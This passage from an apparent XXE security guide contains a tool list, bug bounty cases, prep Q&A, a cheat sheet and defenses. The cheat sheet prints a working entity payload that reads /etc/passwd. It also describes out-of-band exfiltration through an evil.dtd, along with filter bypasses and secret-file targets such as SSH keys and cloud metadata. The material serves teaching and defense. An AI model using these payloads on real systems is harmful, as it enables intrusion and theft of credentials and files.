XXEinjector	Automating XXE exploitation (OOB, error-based)
oxml_xxe	Generating DOCX/XLSX/PPTX with XXE payloads
docem	Embedding XXE into DOCX/XLSX/ODT
python3 -m http.server	Quick server for receiving OOB and serving evil.dtd

15. Notable Cases

Facebook (2014, Bug Bounty): Blind XXE via DOCX upload on the careers portal → reading /etc/passwd. Bounty $30,000+.

Uber (2016, Bug Bounty): XXE in the SAML parser → reading arbitrary files from the server.

Google (2014, Bug Bounty): XXE via an XML file upload in the Google Toolbar button gallery.

PortSwigger Research: XXE via SVG in avatar uploads — a common pattern in real-world applications.

16. Q&A — Prep Questions

1. What is XXE?

A vulnerability in XML parsers where the parser resolves external entities defined in the DTD. The attacker specifies a URI via SYSTEM — the parser automatically fetches the file or URL contents and substitutes them into the document. This isn't a bug in application code — it's the design of the XML specification from 1998, which most parsers support by default.

2. What's the key prerequisite for XXE?

The parser must process DTD (Document Type Definition) and support external entities. No DTD means no entity declarations means no XXE. If DOCTYPE is prohibited at the parser level — the attack is impossible (except for XInclude, which works without DTD).

3. What's the typical impact of XXE?

Reading arbitrary files (file:///etc/passwd, configs, SSH keys, .env), SSRF to internal services and cloud metadata (IAM keys), DoS via Billion Laughs. In rare cases — RCE via expect:// (PHP) or a deserialization chain. Blind XXE adds OOB exfiltration and error-based data leaks.

4. How does XXE differ from regular XML injection?

XML injection is about manipulating the structure of an XML document (inserting tags, changing values). XXE exploits the parser's own capabilities through DTD and entities. XXE doesn't change XML logic — it makes the parser load external resources. These are different levels of attack: injection works with data, XXE works with the parsing mechanism.

5. What is blind XXE?

A situation where the parser resolves external entities, but the result isn't displayed in the response. Exploitation goes through three channels: OOB (out-of-band), sending data via an HTTP/DNS request to the attacker's server using parameter entities and an external DTD; error-based, triggering an error whose text contains the data; and redefining an entity from a local system DTD when outbound connections are blocked.

6. How does XXE turn into SSRF?

Replace file:// with http:// in the SYSTEM URI. The parser makes an HTTP request to the specified address — including internal addresses (169.254.169.254 for cloud metadata, localhost:PORT for internal services). XXE is one of the simplest vectors for SSRF, because the parser makes the request automatically.

7. Why is "we blocked DOCTYPE" not always the end of the story?

XInclude doesn't require DOCTYPE — it works through an XML namespace and can be injected even when the attacker only controls part of the XML document. XSLT transformations use document() to load external resources — a separate vector, unrelated to DTD. SVG, DOCX, XLSX are XML formats that may be processed by other parsers with different settings.

8. Why is it dangerous to rely on "our parser is safe by default"?

Java DocumentBuilderFactory is vulnerable by default even in Java 17+. PHP with the LIBXML_NOENT flag enables entity substitution (the name is misleading). Python xml.etree.ElementTree doesn't support external entities but is vulnerable to Billion Laughs. Every parser requires checking the specific version and configuration — there's no universal "safe by default".

9. What is Billion Laughs and why is it discussed alongside XXE?

An attack based on nested entities where each level references the previous one 10 times — exponential expansion. 9 levels of nesting = 10^9 copies of the string "lol" — gigabytes in parser memory. Doesn't leak data, but confirms DTD processing (if Billion Laughs works — the parser processes entities, you can try XXE). Some parsers are protected against external entities but vulnerable to Billion Laughs.

10. What does proper XXE defense look like?

Disable DTD entirely at the parser level (disallow-doctype-decl in Java, DtdProcessing.Prohibit in .NET). Don't rely on filtering input data: filters get bypassed (UTF-16, parameter entities). Don't use XML where JSON would work. Check parsers for all formats that can contain XML: SVG, DOCX, XLSX, SAML. Track specific library versions and their defaults instead of relying on "probably safe".

17. Quick Reference Cheatsheet

XXE = parser resolves external entities from DTD

Entities:
  internal/external — where the value comes from
  general (&name;) / parameter (%name;) — where it's used
  Parameter entities → for blind XXE (work inside DTD)
  Parameter entities in internal DTD subset are restricted →
    need external DTD (or the local DTD trick)

Where: XML API, SOAP, SVG, DOCX/XLSX, Content-Type swap JSON→XML,
       SAML, GPX, XHTML, PDF generation from XSLT

Types:
  Classic     → response visible, SYSTEM "file:///..."
  Blind OOB   → parameter entities + evil.dtd → HTTP callback
  Error-based → data in the error message (when errors are returned)
  Local DTD   → entity redefinition from system DTD (no outbound)
  XInclude    → no control over DOCTYPE
  XSLT        → document() for file read and HTTP (no DTD)

Payload (basic):
  <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
  <foo>&xxe;</foo>

Bad characters (< &):
  PHP → php://filter/convert.base64-encode/resource=...
  General → CDATA wrapper via parameter entities
  Java → jar:// to bypass restrictions

Chains:
  XXE→SSRF, XXE→LFI, XXE→RCE (expect://),
  Blind XXE+DNS, SSRF→XXE

Targets: /etc/passwd, .env, SSH keys, cloud metadata, internal APIs

Defense:
  Disable DTD entirely (disallow-doctype-decl)
  LIBXML_NOENT → ENABLES substitution (trap!)
  Java is vulnerable by default even in 17+
  Python xml.etree — no external entities, but has Billion Laughs
  Don't filter — disable. Not XML — JSON.

Severity: files with secrets / cloud keys = critical,
          /etc/passwd = high, blind = medium, DoS = low
